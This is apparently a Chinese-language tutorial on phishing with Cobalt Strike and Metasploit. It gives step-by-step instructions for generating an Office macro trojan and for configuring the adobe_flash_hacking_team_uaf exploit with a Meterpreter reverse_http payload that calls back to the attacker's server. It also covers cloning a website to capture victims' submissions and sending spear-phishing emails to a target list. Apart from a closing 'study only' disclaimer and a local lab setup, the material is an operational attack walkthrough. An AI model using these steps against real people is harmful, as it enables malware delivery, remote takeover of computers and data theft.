​網上有關於office巨集病毒的釣魚文章，生成的巨集病毒很容易被殺軟隔離，我們先簡單介紹下這種方式的運用，如下是利用office巨集進行釣魚的流程：

首先，在cobalt strike中需要建立一個監聽器：

在Listeners中，選擇add建立監聽

我們在建立監聽的時候會發現有多種 payload 供選擇。其中 foreign 指外部監聽，beacon指cobalt strike內部監聽，其他的型別根據http和https以及smb等自行可以選擇，看你主要用到哪種。

這裡，我們建立如下監聽：host和port指cobalt strike的伺服器地址和監聽埠，這裡因為我只部署了一臺cobalt strike團隊伺服器，固選擇部署的這臺即可，埠可以給非佔用的任意埠。

下面我們來生成一個巨集病毒，如圖所示：

在cobalt strike中生成利用程式木馬等在attackes->Packages選項中。以下是每個選項的作用：

HTML Application：生成惡意的HTA木馬檔案​MS Office Macro：生成office巨集病毒檔案​Payload Generator：生成各種語言版本的payload​USB/CD AutoPlay：生成利用自動播放執行的木馬檔案​ Windows Dropper：捆綁器，能夠對文件類進行捆綁​ Windows Executable：生成可執行exe木馬​ Windows Executable(S)：生成無狀態的可執行exe木馬 

選擇MS Office Macro選項，生成巨集病毒。Listener選擇我們第一步建立的監聽連結

啟用office，在office中檢視模組選擇巨集，如圖所示：

建立一個巨集，如圖所示：

將生成的巨集程式碼，複製到office巨集中，如圖所示：

儲存該檔案，儲存的型別選擇啟用的巨集Word文件。（office巨集預設是關閉的）

發現生成的該檔案很容易被殺軟監測出來，並處理掉，加上它的侷限性，在外網實際中意義不大，在內網用用效果可能還好。這裡給大家推薦一篇TideSec安全團隊寫的一篇文章，裡面有說到利用巨集建立永續性後門，這裡就不贅述了。連結地址：https://mp.weixin.qq.com/s/lhg71lVHfp9PY1m8sYXA_A

那麼下面給大家介紹一種可能實際用到的方式：

實驗準備階段：

電腦虛擬機器搭建的郵件伺服器地址：10.10.10.133

Cobalt strike團隊伺服器地址：10.10.10.128

Kali虛擬機器地址：10.10.10.128

這裡我們應用到一個flash外掛漏洞的payloads：adobe_flash_hacking_team_uaf

通過cobalt strike結合metasploit進行實驗，如下：

通過kali啟用metasploit。配置如下資訊：

use exploit/multi/browser/adobe_flash_hacking_team_uaf set payload windows/meterpreter/reverse_httpset lhost 10.10.10.128set lport 80set disablepayloadhandler trueset prependmigrate trueexploit –j

執行後如圖所示，會得到一個利用地址，記錄該地址：

http://10.10.10.128:8080/Iw9ycnRjSC

接下來為了方便釣魚郵件的內容偽造的真實，我們通過cobalt strike克隆一個網站。

如圖所示，進入Web-Drive-by選項選擇Clone Site。這裡說明一下每個選項的含義：

Manage：對開啟的web服務進行管理​ Clone Site：克隆網站，可以記錄受害者提交的資料​ Host File：提供一個檔案下載，可以修改Mime資訊​ Signed Applet Attack：使用java自簽名的程式進行釣魚攻擊​ Smart Applet Attack：自動檢測java版本並進行攻擊，針對Java 1.6.0_45以下以及Java 1.7.0_21以下版本​ System Profiler：用來獲取一些系統資訊，比如系統版本，Flash版本，瀏覽器版本等

配置資訊如下：

其中attack就是我們metasploit中生成的地址連結

如圖是我們克隆出來的百度連結：

這裡返回了利用flash外掛漏洞生成的一個克隆連結。現在我們進行郵件偽造。

1、kali下建立目標清單：leafpad targets.txt

注意中間的紅線用TAB鍵進行分割，這裡的test是姓名。可以是多個郵件地址，每一行一個郵件地址，用TAB鍵分割。後半部分是姓名。

2、建立一個釣魚模板：使用自己的網路郵箱，show original顯示原始碼，這就是我們的“釣魚”模板。將內容複製到剪貼簿，cat >rsa.template，右鍵paste貼上。

QQ的郵箱在顯示郵件原文可以看到原始碼。Foxmail可以在更多選項中的檢視原始碼找到。如圖所示：

在cobalt strike中選擇attack->spear Phish

郵件傳送成功，如果客戶端存在flash漏洞，等待點選郵件模板裡的連結即可跳轉到我們的http://10.10.10.128/search地址，並通過flash漏洞，獲取到該終端的許可權，該終端會成功上線。

注意：因為郵件伺服器和CS團隊伺服器都是我在本地虛擬機器搭建的，不在公網上的。所以暫時未模擬到真實郵件。

本文只用於學習研究，請勿用作其他非法用途